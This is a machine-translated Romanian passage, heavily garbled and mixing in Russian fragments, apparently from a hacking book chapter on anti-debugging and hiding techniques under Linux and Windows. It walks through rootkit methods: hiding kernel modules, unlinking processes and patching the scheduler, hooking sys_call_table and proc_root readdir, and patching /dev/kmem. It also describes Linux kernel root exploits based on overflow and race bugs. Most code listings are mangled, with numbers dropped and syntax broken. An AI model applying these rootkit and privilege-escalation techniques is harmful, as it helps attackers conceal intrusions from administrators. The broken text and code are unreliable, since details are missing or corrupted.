încărca modulele Rețineți că primirea unei rădăcini este un subiect al unei conversațiiseparate și va fi considerat puțin mai departe în acest capitol (a se vedea secțiunea „Captură inel în Linux”) Pentruca modulul să se încarce automat cu sistemul de operare - adăugați -l la fișierul /etc /module Echipa ISMOD (sau DD if=/proc/module BS = L) afișează lista de module încărcate, iar RMMOD MY MODULE - descarcă modulul din memorie Acordațiatenție lipsei de expansiune în ultimul caz (lista ) ■ Listarea Lista modulelor emise de comanda ISMOD, olinie cu modulul nostru;Evidențiat cu dimensiunea modulului de font cu jumătate de fat utilizat de Tainted: P My Module (neutilizat) Parport - CRS (Autoclean) IR Procesor [Termal] F A (neutilizat) Buton (neutilizat) RTC Autoclean ) BusLogic (Autoclean) Ext (Autoclean) Aspectul neașteptat al noilormodule este întotdeauna administratori alarmanți, așa că înainte de a începe operațiunile de luptă, ar trebui deghizat,deoarece ar trebui deghizat ca Următoarele metode sunt populare: □ Excluderea modulului din lista modulelor (cunoscute sub numele de metodă) In , A se vedea fișierul Modhidel c de peCD, furnizat la această carte) Această metodă este extrem de nesigură, împiedică activitatea PS, Top și alte astfel deutilități, adesea scade sistemul □ Interceptarea apelurilor la /proc /module, cunoscută sub numele de metoda RunarJensen, publicată pe Bugtraq și implementată în același mod ca interceptarea restului sistemului de fișiere Aceasta esteo metodă destul de voluminoasă și nesigură, neputincioasă împotriva dd if =/proc/module BS = L □ Măcinând structurainformațiilor despre modul (metoda proiectantului SLAR) Această metodă este descrisă în articolul „Wekening the LinuxKernel”, publicat în numărul al Phrack (http://www phrack org/ probleme html? Problemă = & id = #articol), esteelegantă și destul de fiabil Vă vom spune mai multe despre el GPAVA Tehnici anti -deliere și o ascunzătoare șicăutați Windows și Linux Toate informațiile despre modul sunt stocate în structura informațiilor despre modulconținute în interiorul sistemului Sys init module () După ce a pregătit modulul pentru încărcarea și completareacorectă a structurii informațiilor despre modul, acesta transferă controlul funcției noastre init module Nu sunt afișateo caracteristică curioasă a modulelor nuclee - fără nume, fără legături (referințe)!Pentru a elimina modulul din listă,este suficient să resetați câmpurile Nume și Refs Este ușor Este mult mai dificil să se stabilească adresa structuriiinformațiilor modulului în sine Nucleul nu este interesat să -l informeze la prima cerere reconvențională, așa cătrebuie să acționezi furios Explorarea gunoiului rămas în registre la momentul transferului gestionării init module,Solar Designer a constatat că unul dintre ei conține un indicator pentru Informații despre modul!În versiunea sa anucleului, a fost un registru EBX, în alte versiuni poate fi complet diferit În plus, există un patch special pentrunucleele vechi, care conectează această lacună Este adevărat, însă, este demn de remarcat faptul că nu toată lumea ainstalat -o Cu toate acestea, adresa instrucțiunii mașinii care se referă la structura informațiilor despre modul esteușor de setată prin DizAssembing, mai precis, nu de adresa structurii informațiilor modulului în sine, ci adresacomenzii mașinii care se referă la această structură Adevărat, în fiecare versiune a nucleului va fi cel mai simpluexemplu de deghizare arată ca arătat în lista Bingling Modul deghizare de către designerul solar Intinit mude () {registru structmodulul *mp asm ("% ebx" );// Înlocuiți un registru aici, // în care nucleul dvs deține // informațiile despre modululde adrese *(char*) mp-> nume = o;mp-> size = ;mp-> refs = ;// macină numele modulului // macinăm dimensiunea // GISCREFERINȚE Orez Consecințele mascării modulului prin metoda proiectantului solar - echipe INSMOD/ SMOD/RMMOD Partea V Codicopaging practic este în mod incorect determinarea adreseiinformațiilor modulului, cel mai probabil, vor renunța la miezul sistemului sau va bloca vizualizarea a modululuiimediat, care va elibera imediat administratorul (Fig ) Dar avem o altă opțiune în rezervă Ne uităm la listamodulelor instalate, găsim cele mai inutile dintre ele, îl descărcăm din memorie și încărcăm propriile noastre - cuacelași nume precis Dacă avem noroc, administratorul nu va observa nimic excluderea procesului din lista de sarcinieste o listă a tuturor proceselor este stocată în nucleu sub forma unei liste de sarcină de destestrie dublă, a căreidefiniție poate fi găsit în fișierul linux/sched h În același timp, câmpul Next Task indică următorul proces din listă,și prev task la cel anterior Fizic, Task struct se găsește în unitățile de control al proceselor (Block Control Process,RSV), a căror adresă este cunoscută pentru fiecare proces Contextul contextului este realizat de planificator, caredetermină ce proces va fi efectuat după cum urmează (Fig ) Dacă excludem procesul nostru din listă, acesta vadispărea automat din lista de procese /RGO, dar nu va mai primi niciodată managementul, ceea ce nu este inclus înplanurile noastre Task array fig Organizarea proceselor în Linux GPAV Tehnici anti -landing și o ascunzătoareși căutați Windows și Linux urmărind o listă de procese, este ușor de constatat că nu conține un proces al cărui PIDeste zero Dar există un astfel de proces (mai precis - un pseudo -proces)!Este creat de sistemul de operare pentru anumăra încărcarea procesorului și alte scopuri oficiale Să presupunem că trebuie să ascundem procesul cu unidentificator din excludeți -l dintr -o listă cu două dedestroyed, lipitând câmpurile Next task/Prev task cu douăprocese vecine Ne vom implica procesul în procesul cu zero PID, formalizându -ne pe noi înșine ca un proces matern(pentru aceasta câmpul P PPTR este responsabil) și modifică codul planificatorului, astfel încât părintele cu zeroPID cel puțin episodic să primească management (Fig ) Dacă trebuie să ascundeți mai multe proces, acestea pot ficombinate în Lanțul folosind câmpul p pptr sau orice alt câmp cu adevărat fără echivoc Task array fig Înlăturarea procesuluidin lista de procese dublu -administrată Codul sursă al planificatorului este conținut în fișierul/usr/src/linux/kernel/sched c Fragmentul de care avem nevoie este ușor de găsit prin bunătatea cuvintelor cheie (numelefuncției care determină „semnificația” procesului în ochii planificatorului) În diferite nuclee, arată diferit Unadintre opțiunile posibile de implementare este prezentată în lista PARTEA U COPPER PRACTIC C = - ;//Valoarea inițială a „Greutății” // Căutăm procesul cu cea mai mare „greutate” în linia de executare a proceselor, întimp ce (p '= & init task) {// Determinați „greutatea” procesului în ochii planificatorului // (Că este, gradul său denecesitate pentru timpul procesorului) Greutate = bunătate (anterior, p);// Alegeți un proces care este mai puternicdecât toți care au nevoie de timpul procesorului, // Pentru procesoarele cu aceeași „greutate” folosim câmpul RGY if(greutate> c) (c = greutate; next = p;} p = p-> next run; // Toate procesele ne-au dezvoltat Quanta, începe o nouă eră // Un loc bun pentru a adăuga control la // proces deghizat Procedura de implementare în planificator se realizeazăconform schemei standard: □ Salvăm instrucțiunile șterse în stivă □ Intrăm comanda tranziției la funcția noastră caredistribuie cantitatea de procesor a procesului zero printre procesele ascunse □ Efectuăm instrucțiuni salvateanterior □ Întoarceți conducerea transportatorului Cea mai simplă implementare a programului este prezentată в листинdumneavoastră Л Angelfire com> */#define kernel #define modul #define linux #include #define codejump #define Backup / * Numărul de octeți la backup este variabil (cel puțin ), Important este niciodatăsă nu rupeți un GPAV Anti -WesternRecepții și o ascundere și căutați Windows și Linux Static CharBackup One [Backup+Codejump] = "\ x \ x \ x \ x \ x \ x \ xb \ x \ x \ x \ x \ x \ x \ x \x \ x \ x \ x \ x \ x \ x \ xeo '';static char jump code [codejump] = "\ xb \ x \ x \ x \ x \ xff\ xeo";#Define First Address xc // Adresa funcției pentru a suprascrie memorie nesemnată Long ';Void cenobite(void) {printkASM volatile ("Mov %ebp, %esp; popi %esp; jmp backup one); /* Acest cod ASM este pentru raportarea stivei Primul octeți ai unei funcții (funcția cr Nu poate restabili stiva, deci trebuie să Faceți -l de mână Cu saltul mergemsă executăm codul backupat și apoi sărim în funcția inițială int init module (void) { * (nesemnat lung *) și jump code[ ] = (nesemnat lung) cenobite; * (nesemnat lung *) & backup one [backup+ ] = (nesemnat lung) (ftrst address+ backup);memory = (nesemnat lung *) first address; memcpy (backup one, memorie, codeback); memcpy (memorie, jump code, codejump);return ;} Voeid Cleanup Mudele (void) {memory (memorie, backup one, backup);} Deoarece ingineria planificatoruluidepinde nu numai de versiunile nucleului, ci și de cheile de compilare, pentru a ataca sistemul arbitrar este aproapeobraznic Trebuie Mai întâi copiați nucleul de pe mașina dvs și îl faceți, apoi dezvoltați o strategieadecvată Renia Dacă mașina atacată folosește nucleul standard, putem încerca să identificăm versiunea sa prin semnăturăfolosind o strategie de implementare pre -pregătită Nu toți administratorii își recomplă nucleele, astfel încât astfelde tactici funcționează cu succes A fost prezentată pentru prima dată la Conferința Europeană Black Hat în , a căreiprezentare electronică se află în fișierul http://www blackhat com/presentations/bh-europe- /bh- -butler pdf Prinacest principiu, multe rute funcționează și, în special, Phantasmagoria Interceptarea apelurilor de sistem vă amintițiMS-DOS?Acolo, stabilitatea a fost realizată prin înlocuirea întreruperilor în H/Int H Linux în același scopfolosește interceptarea apelurilor de sistem (syscall) Pentru a ascunde procesele și fișierele, este suficient săinterceptați doar un fund - getdents, pe care se bazează Readdir -ul bine cunoscut, care, în totalitate, cu numele său,citește conținutul cataloagelor (și /RGS, inclusiv cu !) Un alt mod legal de a vizualiza lista de procese pentru Linux,în general, nu este Funcția de interceptor funcționează pe partea de sus a GetDents și aproximativ Partea V Vizualizări practice ale capacității de cordon Rezultatul returnat de ea, mușcă tot „în plus” din ea Cu alte cuvinte,interceptorul funcționează ca un filtru Conexiunile de rețea sunt colectate în același mod (sunt montate pe /proc/net) Pentru a deghiza snifferul, este necesar să interceptați apelul de sistem IOCTL, suprimând steagul Promisc Iarinterceptarea apelului de sistem get kernel symbols vă permite să vă deghizați Modul LKM, astfel încât nimeni să nu -l găsească Sună tentant Rămâne doar să implementăm acest lucru în practică Nucleulexportă extern vood sys call table, care conține o serie de semne pentru apeluri de sistem (syscalls), fiecare celulăconține fie un indicator valid la syscall -ul corespunzător, fie valoarea nulă care indică faptul că acest apel desistem nu este implementat Doar anunțați în modulul dvs o variabilă *sys call table [], apoi toate apelurile sistemicevor fi în mâinile voastre Numele apelurilor de sistem cunoscute sunt listate în fișierul/usr/include/syscall h Înspecial, sys call table [sys getdents] returnează indicatorul la GetDents Cel mai simplu exemplu de interceptare esteprezentat în lista Informații mai detaliate pot fi găsite în articolul „Slăbirea kernelului Linux”, publicate înnumărul al Phrack (http://www phrack org/issues html?issue= &id= #article) > - // indicator la sistemul de apeluride sistem Extern void *sys call table [];// Semne pentru apeluri vechi ale sistemului int ( *o getdents) (uint, strictîngrozitor *, uint);// interceptare!Intu module (void) {// Obțineți indicatorul la originalul // Sistemul de sistemsys getdents // și salvați -l în variabila o getDent o getdents = sys call table [sys getdents];// introducemindicatorul la interceptor // (codul interceptorului în sine pentru economii nu este afișat aici) sys call table[sys getdents] = (void *) n getdents;// Întoarcere Întoarce ;// restaurarea manipulatoarelor originale, voidCleanup Module (void) {sys call table [sys getdents] = o getdents;Conform acestui principiu, marea majoritate a Rutkitasfuncționează Adevărat, după ce a lovit nucleul necunoscut, unii dintre ei nu mai funcționează, ceea ce nu estesurprinzător!La urma urmei, aspectul sistemului apelează se schimbă de la nucleu la nucleu (Fig ) GPAVA Tehnici anti -deliere și ascundeți și căutați sub Windows și Linux E & 'O'Z H: H Fig Consecințeleinterceptării nereușite a apelurilor de sistem interceptează întrebările în sistemul de fișiere Exportați variabilaproc root - rădăcina unode (root inode) a sistemului de fișiere virtuale proc root, montat în mod tradițional pe catalog/rgos Dacă doriți, ne putem instala propriul tăietor de filtru deasupra, ascunzând procesele de hacker de ochiiindurerați Spre deosebire de apelurile de sistem, interceptarea variabilei proc root nu este sensibilă la versiuneanucleului, iar aceasta este deja un avantaj!Cel mai simplu interceptor poate arăta așa cum se arată în lista Pentru mai multe informații, contactați articolul „Progrese în kernel hacking”, publicat în numărul al Phrack(http://www phrack org/issues html?issue= &id= #article) \ Listarea Un nou filtru pentru sistemul de fișiereProc root // Global Index pentru funcția originală FillDIR FillDir T Real FillDir,- Static int new filldir root (void* buf, const char* nume, intslen, off t offset, {ino t ino) // Analizăm fiecare nume din catalog, // acesta estenumele acelui modul/fișier/fișier/fișier Conexiune, // pe care vrem să -l ascundem, să returnăm zero, // altfel, sătransmită gestionarea funcției originale // filldir if (ishidden (nume)) return ;Return real filldir ( buf, nume,namlen, offset, ino);// Funcție nouă Readdir int new readdir root (struct file 'a, void *b, filldir t c) Partea V Cord-capabilitate practică {// Inițializați indicatorul la funcția originală FillDIR // De fapt, acest lucru nu estenecesar pentru a o face de fiecare dată, pur și simplu // Deci este atât de mai ușor pentru noi real filldir =c;Returnează old readddir root (a, b, new filldir root);// Instalați propriul nostru filtru Proc root file ops-> readdir= new reddir root;Când modulele nu sunt disponibile pentru a combate LKM-Rutkis, unii administratori compilează nucleulfără a suporta module încărcate și ștergeți fișierul System map, privându-ne de tabelul de caractere Dar hackeriisupraviețuiesc chiar și în aceste condiții dure Ideologia Unix este favorabil diferită de Windows Că orice esență(indiferent dacă este un dispozitiv, un proces sau o conexiune de rețea) este montat pe un sistem de fișiere, respectândregulile generale RAM, reprezentat de „pseudo -anti -detection” /dev /mem (memoria fizică înainte de difuzarea virtuală)și /dev /kmem nu au scăpat de această soartă Doar Root poate manipula aceste dispozitive, dar nu este necesar să coborâmla nivelul nucleului, ceea ce înseamnă că nu avem nevoie de suport pentru modalitate!Următoarele funcții demonstreazătehnica de citire/înregistrare a memoriei nucleare de la nivelul aplicat (lista ) Listarea Rebbed/înregistrare e/de la/dev/kmem // citirea datelor de la/dev/kmem static Iniine int rkrn (int fd, intoffseet, void *buf, int size) dacă (fd, offset, )! = offseet) return ;if (readfd, buf, size) '= size) return ;Dimensiunea returului;} // Înregistrarea datelor în /dev /kmem Static Iniine int wkm (int fd, int offset, void *buf,int size) {if (lseek (fd, Offset, ) '= offset) returnare ;If (fd, buf, size) '= size) return ;Dimensiunea returului;Rămâne doar să găsești unsistem de apeluri de sistem în toate aceste gunoi Dar cum o vom găsi dacă nu avem informații simbolice?!Fără panică!Vomfi ajutați de procesorul central și de codul mașinii procesorului de întrerupere int OH, șeful acestor apeluri desistem Codul său dizAssembl în cazul general arată așa cum se arată în lista xs S : PUSH %EAX xC BC : CLD OHSOSISS : Push %es GPAVA Tehnici anti -landing și ascundeți șiascundeți și miez xc bcd : push %ebp OxcOlOSbce : push%edi xc bcf : push %esi xc bd : push %edx xc bdl : push %ecx xc bd : push %ebx xc bd :mov $ x , %edx xc bd : mov %edx, %ds xc bda : mov %edx, %es xc bdc mov $ xffffeooo,%ebx oxcolosbel : și%esp,%ebx oхсоюбьез : cmp $ x ,%eax xc be : j ae xc c : Testb $ x , x (%ebx) oxColosBf :JNE xC C xC BF s Calll ♦ OxColeF (,%eax, ) : Mov%EAX , x (%esp, ) OxColosBFF : NOP vezi, la C BF H Comanda de apel este localizată, al cărui argument directeste indicatorul la apelurile sistemului!Adresa comenzii de apel se poate schimba de la un nucleu la altul sau poatenici măcar să nu fie apelat deloc - în unele nuclee, indicatorul către apelurile sistemului este transmis prin registrulintermediar prin comanda MOV Cu alte cuvinte, avem nevoie de o echipă, unul dintre argumentele care este operanduldirect x> ivoooooh Desigur, pentru a -l găsi, trebuie să scrieți un simplu dizassembler (sună mai rău decât arată) sausă găsiți un motor gata pregătit în rețea Sunt destule acolo Și cum să găsiți adresa procesorului INT H în fișierul/dev /kmețn?Întrebați procesorul despre asta - va spune el Echipa SIDT returnează conținutul tabelului de descriptor altabelului traptor, yut), în care elementul H este manipulatorul nostru (Fig ) Listarea arată un fragmentdin codul care determină poziția sistemului de apeluri de sistem în/dev/kmem (versiunea completă este conținută înarticolul „Linux pe kernel-ul lkm” din de numere phr ack ( http: //www phrack org/probleme html? emisiune = & id= #articol)) Listarea Căutați procesorul int H Inside /Dev /KMEM // Analizăm primii de octeți aimanipulatorului #define Calloff Main () nesemnat sys call off;Set nesemnat;Char sc asm [calloff], *p;// citițiconținutul tabelului de întrerupere, ASM ("sidt % ": "= m" (idtr));Printf ("Baza IDTR la x%x \ n", (int) idtr base);//Deschide/dev/kmem Kmem = deschis ("/dev/kmem", o rdonly);if (kmem - ) Check =Strtr (Buf, "Ecx:");printf ("|- [% s] \ n", verificați);if ( *(verificare+ ) == x && *(verificare+ ) == x ){check+= ;Printf ("|- valoare adecvată găsită'Using x% , s \ n", verificare);Printf ("A sosit momentul să apăsațibutonul verificați ID -ul dvs \ n");*(Verificați+ ) = x ;*(-verificați) = 'x ;*(-verificați) =' ';Mod =(nesemnat int*) strtoul (verificare, , );for (sock = ; sock mm-> arg end-current-> mm-> arg start; if (len> = elf prargsz) / * * / len = elf prargsz- ;copy from user (& psinfo pr psargs, / * * / (const chaar *)Curent-> mm-> arg start, len);O revărsare tipică atamponului!Programatorul anunță semnul Len (vezi / * * /) și după ce o perioadă își transmite funcțiilecopi from user, copierea datelor din memoria utilizatorului în zona nucleului Verificarea unei valori negative nu esteefectuată (vezi / * * /) Ce înseamnă asta pentru noi practic?Dar ce!Dacă curentul-> mm-> arg start va fi mai maredecât curentul-> mm-> arg end, o regiune foarte mare a spațiului utilizatorului este copiată în nucleu Partea V Codicopaging practic și cum se poate realiza acest lucru?Analiza arată că variabilele curente-> mm-> arg start șicurent-> mm> arg end sunt inițializate în tabelele create elf „(listarea ) și dacă funcția strnlen user va fiinițializată doar de curentul-> mm- > Arg start și curent-> iran-> arg end își vor păstra valoarea moștenită dinfișierul anterior Listarea Ключевой фрагмент функции create elf tables static elf addr t * create elf tables(char*p, int argc, int envc, struct elfhdr * exec, unsigned long load addr, unsigned long load bias, unsigned longinterp load addr, int ibcs) { current >mm->arg start = (unsigned long ) p;While (argc-> ) {put user ((elf caddr t)(nesemnat lung) p, argv ++);len = stmlen user (p, page size*max arg pages);if ('len || len> page size*max arg pages)return null;/ * * */ p += len;} put user (null, argv),-curent-> mm-> arg end = Curent-> mm-> env start- (nesemnat lung) p;Rămâne un adevărat fleac Este necesar să hack funcția strnlen user, avândambele variabile în secțiunile fișierului ELF cu acces închis (prot none), atunci când accesați care va exista oexcepție Pentru a reseta programul de dump, nucleul va provoca funcția core dump La rândul său, va suna elf core dump,iar apoi se va întâmpla o revărsare!Mutarea zonei nucleului deschide posibilități aproape nelimitate, deoarece codulshell este efectuat pe inelul zero!Demonstrația Exploit se află aici: http://www derkeiler com/mailing-liste/secretfocus/bugtraq/ - / html Nu au existat fluxuri în clasicul UNIX și, prin urmare, nu a existat nicioproblemă de sincronizare Cu funcția furcii și mijloacele dezvoltate de interacțiune inter-proces, fluxurile nu suntfoarte necesare Dar totuși au apărut, perforarea sistemului în partea de jos Nucleul s -a transformat într -o adevăratăbug -Blade Iată doar unul dintre ei, descoperit la începutul lunii ianuarie și care afectează toate nucleeleversiunii , precum și nucleele cu versiuni de la la -rfes și de la la inclusiv Luați înconsiderare un fragment din funcția LOAD ELF LIBRARIE cauzată automat de funcția sys uselib atunci când încărcați o nouăbibliotecă (listarea ) Î Lista Un fragment cheie al funcției load elfjibrary care conține un staticintact elf library (fișier struct *fișier) {down write (& curent-> mm-> nnnap sem);error = do mmap(file, Глава Антиотладочные приемы и игра в прятки под Windows и Linux ELF PAGESTART(е f phdat а->p vaddr),(elf phdata->p filesz + ELF PAGEOFFSET(elf phdata->p vaddr)), PROT READ | PROT WRITE | PROT EXEC, MAP FIXED |Map private | map denwrite, (elf phdata-> p offseet-elf pageoffset (elf phdata-> p vadddr)))));Up write (& curent-> mm->mmap sem);if (eroare! = elf pagestastart (elf phdata-> p vaddr)) goto out free ph;Elf bss = elf phdata-> p vaddr +elf phdata-> p filesz;Padzero (elf bss);Len = elf pagestart (elf phdata-> p filesz elf phdata-> p vaddr +elf min align- );BSS-ELF PHDATA-> P MEMSZ + ELF PHDATA-> P VADDR;if (bss> len) do brk (len, bss - len);După cum putețivedea, semaforul MMAP SEM este lansat înainte de a apela funcția DO BRK, generând astfel problema sincronizăriifluxurilor În același timp, analiza funcției SYS BRK ne convinge că funcțiile do brk ar trebui să fie apelate cu unsemafor cocoșat Luați în considerare un fragment din codul sursă împrumutat din fișierul MM/MMAP C (listarea ) „Listarea Un fragment cheie al funcției sys brk (), care suferă de o încălcare a coerenței \ Structuri dedate oficiale [ ] VMA = KMEM CACHE ALLOC (VM AREA CACHE, SLAB KERNEL);Dacă (ivma) returnează enomem;vma-> vm mm =mm;vma-> vm start = addr;Vma-> vm end = addr + len;vma-> vm flags = steaguri;Vma-> vm page prot = producție map[steaguri și oxof];vma-> vm ops = null;vma-> vm pgoff = ;vma-> vm file = null;vrna-> vrn private data = null;Vma link(mm, vma, prev, rb link, rb parent);În absența unei semafore, starea memoriei virtuale poate fi modificată întreapelurile funcțiilor KMEM CACHE ALLOC și VMA LINK, iar apoi noul creat VMA-Schriter va fi plasat în locul greșit pe caredezvoltatorii l-au bazat!Acest lucru este mai mult decât suficient pentru a captura rădăcină Din păcate, chiar și ceamai simplă exploatare ocupă prea mult spațiu și, prin urmare, nu poate fi dat aici, dar codul sursă este ușor de găsitpe internet Versiunea originală (cu o descriere detaliată a tehnicii de hacking) se află pe:http://www securityfocus com/bid/ /exploit Obținem rădăcină pe mașinile multiprocesorului considerăm o altăvulnerabilitate interesantă, afectând un număr mare de nuclee cu versiuni de Z și mașini multiprocesorizbitoare Descoperită chiar de la începutul anului , rămâne încă relevant, deoarece nu toți administratorii auînființat până la partea V Codicofagul practic al patch -urilor și mașinile multiprocesor (inclusivmicroprocesoarele cu suport pentru hiperthieading) astăzi regula este mai degrabă decât o raritate În orice, procesorulde acces la pagini (pagina de gestionare a erorilor) este de vină, care este numit ori de câte ori aplicația seadresează paginii de memorie neexplorat sau protejat Nu toate greșelile sunt la fel de fatale În special, Linux, la felca majoritatea altor sisteme, distinge memoria de stat nu imediat, ci în părți În partea de sus a memoriei dedicateexistă o pagină, acces la care este interzis intenționat Se numește „Guard Page) Sticla crește treptat și, la un momentdat, „se prăbușește” în pagina Patronel, o excepție interesantă Acesta este interceptat de procesorul de acces lapagini, iar sistemul de operare selectează o anumită cantitate de memorie, mutând pagina de pază la etaj Pe mașinilemonoprocesor, această schemă funcționează ca un ceas, dar problemele apar pe multiprocesor (listarea ) Listarea Fragment cheie al funcției /mm/fault c, care conține eroarea de sincronizare a down read (& mm->mmap sem);/ * * */ vma = find vma (mm, adresă); if ( VMA) goto bad Area;if (vma-> vm start vm flags & vm growsdown)) goto bad area;If (error code & ) { / * * Accesarea stivei de sub %esp esteîntotdeauna o eroare * „ + ” se datorează chiar instrucțiunilor (cum ar fi * pusha) care efectuează post-decregere pestivă și asta nu apar până mai târziu * / if (adresa + esp) / esp) / Esp) * * */ geto bad area;} if(extinde stack (vma, adresă)) goto bad area;Deoarece procesorul de gestionare a erorilor de pagină este efectuat cu unsemafor disponibil doar pentru citire, mai multe fluxuri concurente pot intra simultan în manipulatorul din spateleliniei / * * * / Luați în considerare ce se va întâmpla dacă două fluxuri care împărtășesc aceeași memorie virtuală vorapela simultan pagina întreruperilor paginii Scenariul aproximativ al atacului arată astfel: Stream se întoarce cătrepagina de pază și provoacă o excepție de la Efect L Stream se întoarce către pagina Guard Page + Page Size și esteexclus de Efect Starea memoriei virtuale va arăta ca prezentată în fig [Nopage] [efectuoasă Starea memorieivirtuale în momentul apelului procesorului de întrerupere a paginii cu două fluxuri Dacă fluxul este înaintea fluxuluiI și primul care va evidenția pagina sa pagina , fluxul va provoca o încălcare gravă în activitatea lucrării VirtualMemory Manager, deoarece granița inferioară a stivei este acum mai mare decât defectul și, prin urmare, pagina paginii nu iese în evidență, dar GPAVA devine Tehnici anti -landing și o ascunzătoare și căutați Windows și Linux Disponibil pentru citire/înregistrare la ambele fluxuri, iar după finalizarea procesului, acesta nu va fi eliminat (Fig ) [Pagina ] [Pagina ѵMA] Fig Starea memoriei virtuale în momentul ieșirii din pagina întreruperilor paginiiCe este în pagina ?Depinde de starea catalogului de pagini Deoarece în Linux Memory este un fel de cache a spațiului deadrese virtuale, aceeași pagină în momente diferite poate fi folosită atât de aplicațiile de bază, cât și de celeutilizator (inclusiv de procesele privilegiate) După așteptarea codului nucleului sau a oricărui proces privilegiat(acest lucru este ușor de determinat prin semnătura sa), un hacker poate introduce un poate sau pur și simplu săaranjeze un Grandiose DOS aruncând Page cu gunoi fără sens Descrierea acestei vulnerabilitate și exploatare poate figăsită aici: http://www securiteam com/unixfocus/ GP Kekq html Capitolul Boofer Overflow în sisteme cu un paharneîmplinit disperat să facă față propriilor erori, Microsoft împreună cu Intel și AMD a implementat prevenirea execuțieidatelor (DEP), concepute pentru a pune capăt atacurilor la distanță o dată pentru totdeauna Cu toate acestea, acestlucru nu s -a întâmplat, iar apărarea a reușit să se deplaseze În ciuda tuturor eforturilor, a săpat șanțuri și aridicat structuri de protecție, intensitatea atacurilor la distanță nu este redusă și devine din ce în ce mai dificil săle reflecți Hackerii au învățat să mascheze procesele dăunătoare pentru Linux/BSD și sisteme din familia Windows NT, s-au ocupat de firewall -urile și sistemele distribuite stăpânite - sute de mii de mașini infectate controlate prin IRC-uri sunt o adevărată armată Interesele utilizatorilor individuali afectate de atac se estompează în fundal, dând locsiguranței tuturor infrastructurii în ansamblu Iar infrastructura este deja serioasă Analiza arată că marea majoritate aatacurilor folosesc erorile revărsării tamponului Principiul fundamental al acestor erori este explicat pe scurt înFig Problema este că tamponul local „crește” în direcția opusă direcției de creștere a stivei și, în anumitecircumstanțe, poate fi șters cu adresa de retur Ponderea leului de astfel de erori este conținută în Internet Explorer,care, în special, a fost motivul tranziției NASA la Firefox(http://www securitylab ru/news/ php?rl=rss&r =allnews) Că nu puteți întâmpina decât Cu toate acestea, Firefox, lafel ca toate celelalte browsere, nu este, de asemenea, lipsit de greșeli Conține un număr mare de vulnerabilitățicritice care permit atacatorului să -și execute codul Iată doar unul dintre aceste găuri:http://www securitylab ru/vulnerabil/ o php FIG Local Boofer Adresa de întoarcere Fig O imagine schematică aunei stive (săgeata arată direcția în care crește stiva) Niciun software nu poate fi considerat sigur!Chiar dacăinstalați patch -uri proaspete în timp util, există întotdeauna riscul ca hackerul să găsească o nouă gaură despre carenimeni nu știe și El va profita cu succes de el Apropo, dezvoltarea programelor de atac în ultimii ani s -a ridicat din genunchiientuziasmului pur și s -a angajat într -un flux comercial cu investiții serioase Încă o dată, a apărut o înțelegere pecare nu o puteți trăi așa și trebuie să rezolvați ceva Încercările de a termina cu atacuri la distanță au fostîntreprinse în mod repetat încă din anii , GPAVA Boofer copleșitor în sisteme cu sticlă neîmplinită , mai ales după viermele Morris, dar totul este fără succes Cu toate acestea, Microsoft a decisun pas disperat și a reînviat vechile idei găsite în depozitul de depozit al istoriei și a realizat fără a ține cont deo înțelegere a situației actuale Tehnologia de protecție a datelor (prevenirea execuției datelor, DEP), implementată înWindows XP SP și Windows Server SP , face o secțiune de date, un stivă și o grămadă de incompletă, care (teoretic)împiedică codurile de shell și detectează o întreagă clasă de atacuri la distanță pe baza revărsării Care esterevoluționarul unei astfel de decizii?Într -adevăr, de pe vremea Windows (ca să nu mai vorbim de standardul POSIXadoptat în ), X Atria are doar în secțiunea de cod și lipsește pentru toți ceilalți Este suficient să luați oricefișier elf/PE și să vedeți!Așa este așa, dar procesoarele X au propria opinie în acest sens: la nivel de pagină,procesorul acceptă doar două atribute cusute: -a- (accesibilă-pagina este disponibilă pentru citire/execuție) și -w-(scrisă - Înregistrarea este permisă) X Atitribut este prezent numai în tabelul selector, ceea ce înseamnă că nu putempermite/interzicem selectiv executarea codului pentru pagini individuale, ci numai pentru întregul segment De aceea,Windows cu modelul ei de memorie plană este obligat să interpreteze atributul -g- as -x și -x- -as -g- Adică, dreptul dea citi pagina oferă un drept implicit la execuția ei și invers De fapt, aici nu există arbitrar din partea procesorului:problema poate fi rezolvată ca parte a unui model plat Este suficient „doar” să regrupați segmentele și să setațilimitele corecte (Fig ) Desigur, acest lucru necesită eforturi serioase din partea dezvoltatorilor nucleului -astfel încât pentru a implementa această idee, este necesar să se utilizeze un tampon separat al eșantionului avansatpentru instrucțiuni și date (ITLB/DTLB), etc Segment de orez „Emulația” bițiului NX/XD pe procesorul X De cearhitectura x a avut posibilitatea de a seta X atric la nivelul paginii?O întrebare retorică Cel mai probabil, întimpul proiectării , nimeni nu avea nevoie de ea, așa că au decis să nu complice logica procesorului fără a finevoie Dar, în Itanium, acest atribut este inițial prezent, iar un bit special cunoscut în cadrul prescurtării XD (de laExecute Disable - este interzis), stabilește dacă codul este permis în această pagină sau nu Un bit similar estedisponibil și în procesoarele AMD- (Opteron și Athlon- ), doar acolo se numește NX (de la fără-executiv-inxtricable) Cineva din companie a venit cu un gând „sănătos” pentru a declara „tehnologia” de atributare X, iar o„protecție îmbunătățită a virusului” bazată pe publicitate (EOP) a fost imediat desfășurată în jurul NX-Bita Site -ulcompaniei a postat multe videoclipuri colorate care demonstrează modul în care AMD luptă cu virușii la nivelulprocesorului (!) Nu este surprinzător faptul că versiunea pe de biți a Windows NT „de la naștere” are o grămadă și ostivă neîmplinită!Microsoft tocmai a ridicat atributul de apărare aruncat către ea și l -a construit în sistem Aceastaeste esența depinerii hardware (hardware-aplicate) Principiile organizării memoriei virtuale și a noilor atribute deprotecție în PDE/PTE sunt prezentate în Fig și, respectiv, Executabil - Executabil Partea V Codicopagingul practic este logic (segmentat) □ liniar (virtual) □ Fig Organizarea memoriei virtuale Fig NX-BIT-un nou atribut de protecție în PDE/PTE, folosind AMD extins Hype, Intel a introdus sprijinul XD-Bit în procesoarelePentium pe de biți, punând la dispoziția tuturor „tehnologia” pentru toată lumea (cei care doresc Transfer la AMD- de dragul unui singur DEP nu a fost atât de multe) Strict vorbind, NX-Bit este prezent nu numai în procesoarele „reale”pe de biți de la AMD, ci și în nucleul pe de biți colectat pe nucleul pe de biți (adică lucrând într-o stare deemulare permanentă a I ) procesoare-Exemplu Sempron Este suficient să instalați ultimul Pentium- și să actualizațimiezul, astfel încât Windows să poată utiliza noi funcții hardware În acest caz, atunci când încercați să efectuați uncod aplicat într -o grămadă, o secțiune sau pe o stivă, o excepție de la tipul status access violation (COT H) esteexcitat și, dacă programatorul nu și -a instalat manipulatorul SEH, execuția programului este completat cu emitereamesajului pentru a ajuta la protejare, Windows are A închis acest program (Fig ) În modul nucleu, atunci când încercați să efectuați cod într -o zonă de memorieneîmplinită, este exclusă excluderea încercării execute of noexecut memory 